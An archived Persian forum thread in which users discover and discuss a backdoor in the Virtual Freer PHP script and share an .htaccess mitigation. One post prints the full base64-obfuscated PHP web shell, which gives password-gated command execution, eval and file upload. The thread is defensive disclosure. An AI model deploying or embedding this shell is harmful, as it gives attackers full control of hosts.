ورود

توجه ! این یک نسخه آرشیو شده میباشد و در این حالت شما عکسی را مشاهده نمیکنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : مشکل جالب در فریرر

saeid1346
January 25th, 2016, 00:36
ویرایش شد

ata3929
February 4th, 2016, 15:36
سلام دوستان
از شما تقاضا دارم اخرین نسخه اسکریپت فریر رو از این سایت که به ظاهر معتبره دانلود کنید

http://freer.ir/virtual/download.php

این مسیر رو پیدا کنید

include/libs/smarty/sysplugins/

فایل
smarty_intemplateparser.php رو باز کنید

و اگر صلاح میدونید توضیحی ارائه بدید بابت این کد پایین !!!!

ویرایش شد...

با این که این قضیه گزارش شده بود بهشون ولی هنوز اصلاح نشده و تاریخ اصلاح فایل 9/1/2016 هستش !!!!

هنوزم چند فایل دیگه مثل این داخل اسکریپت هست

البته شاید سایت این بنده خدا هک شده باشه ولی به هر حال یه شخصی داره سو استفاده میکنه.

<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApO3NldF 9tYWdpY19xdW90ZXNfcnVudGltZSgwKTtzZXNzaW9uX3N0YXJ0 KCk7DQokYmxhY2s9JzhmNzU4YmNhZWNmMjkxMDllOGQzMGVhYm JkZGEzOWU2JzsNCmlmKG1kNSgkX1JFUVVFU1RbJ2JsYWNrJ10p PT0kYmxhY2sgb3IgJF9TRVNTSU9OWydsb2dpbiddPT0nMScpew 0KJF9TRVNTSU9OWydsb2dpbiddPScxJzsNCmlmKCRfUkVRVUVT VFsnZXZhbCddKXtldmFsKCRfUkVRVUVTVFsnZXZhbCddKTt9aW YoJF9SRVFVRVNUWydkbCddKXt1bmxpbmsoZ2V0Y3dkKCkuRElS RUNUT1JZX1NFUEFSQVRPUi4kX1JFUVVFU1RbJ2RsJ10pO30NCm lmKHN0cnRvbG93ZXIoc3Vic3RyKFBIUF9PUywgMCwgMykpID09 ICJ3aW4iKXskcz0iXFwiO31lbHNleyRzPSIvIjt9JGFkPSRfUk VRVUVTVFsnYWQnXTsNCmlmICgkYWQpe2NoZGlyKCRhZCk7fWVs c2V7JGFkPWdldGN3ZCgpO31pZiAoJF9GSUxFU1siZmYiXSl7bW 92ZV91cGxvYWRlZF9maWxlKCRfRklMRVNbImZmIl1bInRtcF9u YW1lIl0sICRfRklMRVNbImZmIl1bIm5hbWUiXSk7fQ0KaWYgKC RociA9IG9wZW5kaXIoJGFkKSkge3doaWxlKCRmID0gcmVhZGRp cigkaHIpKXtpZihpc19kaXIoJGYpKXskZGY9JGRmLiRmLicNCi c7fWVsc2V7JGxmPSRsZi4kZi4nDQonO319Y2xvc2VkaXIoJGhy KTt9JGZvcm09Jzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9Z2V0Pi c7ZWNobyAnPGNlbnRlcj48dGV4dGFyZWEgY29scz05MCByb3dz PTIwPic7aWYoJF9HRVRbJ2NtZSddKXtwYXNzdGhydSgkX0dFVF snY21lJ10pO31lbHNle2VjaG8gJGRmLiRsZjt9O2VjaG8nPC90 ZXh0YXJlYT4nLiRmb3JtLidDaGFuZ2UgRGlyIDogPGlucHV0IG 5hbWU9YWQgc2l6ZT01MCB2YWx1ZT0nLmdldGN3ZCgpLiRzLic+ PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPUdvPjwvZm9ybT4nLi Rmb3JtLidDb21tYW5kIEV4ZWN1dGUgOiA8aW5wdXQgbmFtZT1j bWUgc2l6ZT01MCB2YWx1ZT1pZD4gPGlucHV0IHR5cGU9c3VibW l0IHZhbHVlPWVYZWN1dGU+PC9mb3JtPjxmb3JtIGFjdGlvbj0i IiBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLW RhdGE+VXBsb2FkIDogPGlucHV0IHNpemU9NTAgdHlwZT1maWxl IG5hbWU9ZmYgPiA8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hZC B2YWx1ZT0nLmdldGN3ZCgpLic+PGlucHV0IHR5cGU9c3VibWl0 IHZhbHVlPVNlbmQ+PC9mb3JtPic7DQp9')); ?>

- - - Updated - - -

http://forum.iranphp.org/Thread-%D9%85%D8%B4%DA%A9%D9%84-%D8%A7%D9%85%D9%86%DB%8C%D8%AA%DB%8C-%D8%A7%D8%B3%DA%A9%D8%B1%DB%8C%D9%BE%D8%AA-virtual-freer
خدمت شما

از سایت فریر دانلود کردم
فایل smarty_internal_templateparser.php دقیق بررسی کردم
کلمه base64_decode حتی پیدا نشد

yastheme
February 4th, 2016, 16:36
از سایت فریر دانلود کردم
فایل smarty_internal_templateparser.php دقیق بررسی کردم
کلمه base64_decode حتی پیدا نشد

من هم با این روش هک مشابه برخوردکرده ام ولی در خود فایل اصلی موردی نیست؛
دیکد:
http://codepad.org/uLGMnrpc

saeid1346
February 4th, 2016, 20:20
هیچیش نیست شما راحت باش فقط یه دسترسی ساده است =))

فقط توصیه میکنم حتما اصلاحش کنید این بخش از فایل رو برای امنیت خودتون ! ;)

- - - Updated - - -

yastheme
همین دیروز فایل اصلاح شده !!! تاریخ تغییر در فایل فشرده ببینید خودتون

به هر حال هاستتون رو بگید حتما اسکن کنن

پست اول ویرایش شد
موفق باشید

Jai
February 5th, 2016, 12:32
بله فایل شل بود :) من دهنم سرویس شد هرکاری میکردم هاستم اجازه اپلود 1.58 فرییر رو نمیداد ارور شل base64 میزد :)

گشتم دیدم فایل
smarty_internal_templateparser.php قسمت آخر هستش و پاک کردم رفع شد

yastheme
February 17th, 2016, 19:50
ظاهرا این یه مشکل جدیه؛ تو سایت های زیادی دیده شده این مشکل !
این نشون دهنده اینه واقعا فریر یک اسکریپت امن دیگه نمی تونه باشه.
زمانی که کاربر در پنل خود فعالیت هایی مثل مشاهده دسته بندی ها یا ساخت دسته بندی جدید دارد یک سری فایل با نام category_20-up.php
در مسیر زیر می سازد:
www.site.com/statics/upload/ (http://www.site.com/statics/upload/)
این فایل های شل دسترسی کامل به هاست را می دهد؛
با حذف کد هایی که در انتهای فایل smarty_internal_templateparser.php اضافه شدهو جدیدا در سایتهای زیادی دیده می شود مشکل را برطرف کنید، البته مشکل کامل برطرف نمی شود؛
همیشه امکان وجود شل های دیگر است؛
اما این شل ها در پوشه هایی هستند که نیاز به اجرای PHP توسط کاربر در آن آدرس از طریق مرورگر نیست !
یک فایل .htaccess بسازید و کد زیر را در آن قرار دهید:

<FilesMatch "\.(?i:php)$">
<IfModule !mod_authz_core.c>
Order allow,deny
Deny from all
</IfModule>
<IfModule mod_authz_core.c>
Require all denied
</IfModule>
</FilesMatch>

این فایل .htaccess را در فولدر های زیر قرار دهید:
include
statics
templates
فایل های فولدر plugins و صفحه اصلی را هم بررسی کنید که کد مخربی وجود نداشته باشد ( تعداد فایل ها محدود است و سریع قابل بررسی است )

ata3929
February 17th, 2016, 19:58
زمانی که کاربر در پنل خود فعالیت هایی مثل مشاهده دسته بندی ها یا ساخت دسته بندی جدید دارد یک سری فایل با نام category_20-up.php
در مسیر زیر می سازد:
با حذف کد هایی که در انتهای فایل smarty_internal_templateparser.php اضافه شدهو جدیدا در سایتهای زیادی دیده می شود مشکل را برطرف کنید، البته مشکل کامل برطرف نمی شود؛
اما این شل ها در پوشه هایی هستند که نیاز به اجرای PHP توسط کاربر در آن آدرس از طریق مرورگر نیست !

Order allow,deny
Deny from all
</IfModule>
Require all denied
</IfModule>
</FilesMatch>

include
statics
templates
فایل های فولدر plugins و صفحه اصلی را هم بررسی کنید که کد مخربی وجود نداشته باشد ( تعداد فایل ها محدود است و سریع قابل بررسی است )

ممنون از توضیحات خوبتون

من اون مسیر و که گفته بودم بررسی کردم همچین فایلی ایجاد میشه

و سوالی که دارم دقیقا این کد چه کاری میکنه ؟ ( میشه دقیق توضیح بدین عملکرد این کد )

yastheme
February 17th, 2016, 20:17
ممنون از توضیحات خوبتون

من اون مسیر و که گفته بودم بررسی کردم همچین فایلی ایجاد میشه

و سوالی که دارم دقیقا این کد چه کاری میکنه ؟ ( میشه دقیق توضیح بدین عملکرد این کد )

به هکر ها اجازه آپلود هر گونه فایل مخرب را می دهد،

us12
February 18th, 2016, 09:45
در مسیر زیر می سازد:

Order allow,deny
Deny from all
</IfModule>
Require all denied
</IfModule>
</FilesMatch>

include
statics
templates

مشکل جدیدی نیست .
هکر به هر طریقی به مدیریت دسترسی داشته باشد از قسمت آپلود عکس برای دسته یا محصولات این کار را به سادگی میتواند انجام دهد.

از این موارد گذشته جدیدا در اخباری که از سایت اصلی لود میکند فایل جاوا اسکریپتی لود میشود که به صورت مخفیانه iframe می سازد و احتمالا ***یدن کوکی و ...

پیشنهاد میکنم پیکج امن کننده را استفاده کنید چون باگ های دیگری هم وجود دارد ...

http://www.softiran.org/view-item/97/virtual-freer-safe-pack.html

s0h3il
February 27th, 2016, 12:47
فایل
smarty_internal_templateparser.php برای من تو اون مسیر اصلا وجود نداره!!

- - - Updated - - -

مشکل جدیدی نیست .
هکر به هر طریقی به مدیریت دسترسی داشته باشد از قسمت آپلود عکس برای دسته یا محصولات این کار را به سادگی میتواند انجام دهد.

از این موارد گذشته جدیدا در اخباری که از سایت اصلی لود میکند فایل جاوا اسکریپتی لود میشود که به صورت مخفیانه iframe می سازد و احتمالا ***یدن کوکی و ...

پیشنهاد میکنم پیکج امن کننده را استفاده کنید چون باگ های دیگری هم وجود دارد ...

http://www.softiran.org/view-item/97/virtual-freer-safe-pack.html

راهنمای نصب این پکیج رو هم بگید تو سایت اصلی چیزی ننوشته

us12
April 8th, 2016, 21:51
فایل
smarty_internal_templateparser.php برای من تو اون مسیر اصلا وجود نداره!!

- - - Updated - - -

راهنمای نصب این پکیج رو هم بگید تو سایت اصلی چیزی ننوشته

روش نصب : فایل زیپ پکیج را در جایی که فریر نصب است ، اکسترک کنید ...